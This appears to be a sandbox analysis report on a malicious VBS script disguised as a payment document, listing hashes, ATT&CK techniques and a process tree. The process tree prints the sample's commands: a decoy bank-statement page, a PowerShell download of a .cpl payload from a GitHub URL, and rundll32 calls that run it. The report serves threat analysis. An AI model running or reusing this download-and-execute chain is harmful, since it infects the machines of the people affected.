eb860d8529dd9d5a2277b1c340d8aa2db7eecdb172d57133038b8f90ce39bb31

Analysis

max time kernel
122s
max time network
123s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
30/03/2025, 18:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Payment_Activity_0037_2025-3-30.vbs
Size

13KB
MD5

1666b10f8f85c81a689e60018dd65abf
SHA1

40320e7700630bc0e35a11cc803cfa3ad46aa79b
SHA256

eb860d8529dd9d5a2277b1c340d8aa2db7eecdb172d57133038b8f90ce39bb31
SHA512

0cae1de09fc3d46a02541a6f34c931e4748f06fbf0add8fa89caccf5a9cbd68d15871453e70320b8d4fc23b75191b984ff47f87ba8dcdada5765628356fb20bc
SSDEEP

192:NB0v8qa258i+h6xp2YXBoN8x6kgqDMOhWm3Gmim3jzVcGZlIyB1AQaAMKz3N2v:3qyi0mdxoY6HyLjpLZlIyUQanKzN2v

Score

8^/10

discovery execution

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

pid	Process
2228	powershell.exe
2756	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rundll32.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

pid	Process
2788	rundll32.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2228	powershell.exe
2756	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2228	powershell.exe
Token: SeDebugPrivilege	2756	powershell.exe

Suspicious use of WriteProcessMemory 32 IoCs

description	pid	Process	procid_target
PID 2060 wrote to memory of 1160	2060	WScript.exe	30
PID 2060 wrote to memory of 1160	2060	WScript.exe	30
PID 2060 wrote to memory of 1160	2060	WScript.exe	30
PID 1160 wrote to memory of 2228	1160	cmd.exe	32
PID 1160 wrote to memory of 2228	1160	cmd.exe	32
PID 1160 wrote to memory of 2228	1160	cmd.exe	32
PID 2060 wrote to memory of 2892	2060	WScript.exe	34
PID 2060 wrote to memory of 2892	2060	WScript.exe	34
PID 2060 wrote to memory of 2892	2060	WScript.exe	34
PID 2892 wrote to memory of 2756	2892	cmd.exe	36
PID 2892 wrote to memory of 2756	2892	cmd.exe	36
PID 2892 wrote to memory of 2756	2892	cmd.exe	36
PID 2060 wrote to memory of 3028	2060	WScript.exe	37
PID 2060 wrote to memory of 3028	2060	WScript.exe	37
PID 2060 wrote to memory of 3028	2060	WScript.exe	37
PID 2060 wrote to memory of 2644	2060	WScript.exe	39
PID 2060 wrote to memory of 2644	2060	WScript.exe	39
PID 2060 wrote to memory of 2644	2060	WScript.exe	39
PID 3028 wrote to memory of 2788	3028	cmd.exe	41
PID 3028 wrote to memory of 2788	3028	cmd.exe	41
PID 3028 wrote to memory of 2788	3028	cmd.exe	41
PID 3028 wrote to memory of 2788	3028	cmd.exe	41
PID 3028 wrote to memory of 2788	3028	cmd.exe	41
PID 3028 wrote to memory of 2788	3028	cmd.exe	41
PID 3028 wrote to memory of 2788	3028	cmd.exe	41
PID 2644 wrote to memory of 2728	2644	cmd.exe	42
PID 2644 wrote to memory of 2728	2644	cmd.exe	42
PID 2644 wrote to memory of 2728	2644	cmd.exe	42
PID 2788 wrote to memory of 2860	2788	rundll32.exe	43
PID 2788 wrote to memory of 2860	2788	rundll32.exe	43
PID 2788 wrote to memory of 2860	2788	rundll32.exe	43
PID 2788 wrote to memory of 2860	2788	rundll32.exe	43

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Payment_Activity_0037_2025-3-30.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2060
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell start-process msedge https://www.scribd.com/document/806838445/Bank-Statement
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1160
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell start-process msedge https://www.scribd.com/document/806838445/Bank-Statement
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2228
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://raw.githubusercontent.com/SC10001/Di/main/DNSBackup.cpl -Outfile C:\ProgramData\DNSBackup\DNSBackup.cpl
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2892
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Invoke-WebRequest -Uri https://raw.githubusercontent.com/SC10001/Di/main/DNSBackup.cpl -Outfile C:\ProgramData\DNSBackup\DNSBackup.cpl
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2756
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start /b C:\Windows\SysWOW64\rundll32.exe shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3028
- - C:\Windows\SysWOW64\rundll32.exe
    C:\Windows\SysWOW64\rundll32.exe shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of WriteProcessMemory
    PID:2788
  - - C:\Windows\system32\RunDll32.exe
      C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl
      4⤵
      PID:2860
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2644
- - C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl
    3⤵
    PID:2728

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
a3d12036a08d59090bbb794aa6918ddf

SHA1
97c7f3ecef2b87fd67480ac49d2b5055e0f452dd

SHA256
0dab1afb2a38d0cb8b6095f03d2330adf00599e2a1e4e63bfb5eb2b5a3736031

SHA512
98c5cc71e2644b6932dbeec5ca391fa3a8c25aef4e49e5375f23289d3040a04d5bef8d9169077b371ee126c65922e1b3c69ca117680ece8b4027cda9d79cd960

Download Submit
memory/2228-4-0x000007FEF582E000-0x000007FEF582F000-memory.dmp

Filesize
4KB

Download
memory/2228-6-0x0000000002790000-0x0000000002798000-memory.dmp

Filesize
32KB

Download
memory/2228-5-0x000000001B620000-0x000000001B902000-memory.dmp

Filesize
2.9MB

Download
memory/2228-7-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

Filesize
9.6MB

Download
memory/2228-8-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

Filesize
9.6MB

Download
memory/2228-9-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

Filesize
9.6MB

Download
memory/2228-10-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

Filesize
9.6MB

Download
memory/2228-11-0x000007FEF5570000-0x000007FEF5F0D000-memory.dmp

Filesize
9.6MB

Download
memory/2756-18-0x0000000001F70000-0x0000000001F78000-memory.dmp

Filesize
32KB

Download
memory/2756-17-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

Filesize
2.9MB

Download